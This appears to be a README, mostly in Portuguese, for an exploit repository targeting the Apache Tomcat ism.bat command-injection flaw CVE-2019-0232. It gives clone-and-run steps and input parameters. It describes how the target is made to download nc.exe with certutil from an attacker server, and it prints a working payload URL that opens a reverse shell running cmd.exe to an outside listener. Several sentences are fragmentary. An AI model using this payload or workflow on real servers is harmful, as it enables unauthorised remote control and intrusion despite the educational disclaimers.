
Hi this is a revised and enhanced code for CVE-2019-0232
Este script explora a vulnerabilidade CVE-2019-0232 no Apache Tomcat, que permite execução remota de código através do tratamento inadequado do script ism.bat. O script utiliza uma técnica de reverse shell empregando certutil e nc.exe (Netcat) para obter acesso remoto ao sistema vulnerável.
ism.bat do Apache Tomcat que pode permitir que atacantes executem comandos arbitrários no servidor. Esta vulnerabilidade ocorre devido à falta de validação adequada da entrada do usuário, permitindo que atacantes acionem a execução de comandos arbitrários através de uma requisição especialmente criada.nc.exe malicioso de um servidor remoto e usá-lo para gerar uma reverse shell.nc.exe) deve estar hospedado em um servidor para a conexão reverse shell.nc.exe: O script envia uma requisição manipulada ao servidor Tomcat vulnerável para baixar o arquivo nc.exe (Netcat) para a máquina alvo usando certutil.nc.exe é baixado, outra requisição é enviada para executar o comando reverse shell, que se conecta de volta ao listener Netcat do atacante.git clone https://github.com/Dharan10/CVE-2019-0232.git
cd CVE-2019-0232
python3 exploit.py
Target Host: O endereço IP do servidor Apache Tomcat a ser explorado.
Target Port: A porta do servidor alvo (padrão: 8080).
Server IP: O endereço IP do servidor que hospeda o nc.exe.
Server Port: O número da porta onde o nc.exe está hospedado (padrão: 80).
Netcat Listener IP: Seu endereço IP que receberá a reverse shell.
Netcat Listener Port: A porta na qual você está ouvindo a reverse shell.
[*] Sending payload to download nc.exe...
[+] URL1 Response: 200
[*] Sending payload to execute reverse shell...
[+] URL2 Response: 200
[*] Reverse shell payload URL: http://192.168.1.10:8080/cgi/ism.bat?&nc.exe+192.168.1.100+1234+-e+cmd.exe
Uma vez executado com sucesso, você deve ter uma conexão reverse shell de volta ao seu listener Netcat.
Este script é destinado apenas para fins educacionais. Não o utilize para atividades maliciosas. Sempre obtenha a devida autorização antes de tentar qualquer teste de penetração ou auditoria de segurança. O uso indevido deste script pode resultar em consequências legais.
Certifique-se de que o servidor Apache Tomcat não está corrigido contra o CVE-2019-0232 antes de usar este exploit. O script pode exigir privilégios administrativos dependendo da configuração do sistema alvo.
A!Z3N(Dharan) Feito com poder!
Este projeto está licenciado sob a Licença MIT.
No entanto, use por sua conta e risco. Este código é fornecido apenas para fins educacionais. Ao usar este código, você concorda em assumir total responsabilidade por quaisquer ações resultantes de seu uso. O uso indevido ou não autorizado deste exploit pode levar a consequências legais. Sempre obtenha a devida autorização antes de realizar qualquer teste de segurança ou teste de penetração em qualquer sistema.
Você é livre para usar, modificar e distribuir este código, mas apenas para fins éticos. O autor não é responsável por qualquer dano causado por este código.
Não use este exploit sem a permissão explícita do proprietário do sistema alvo.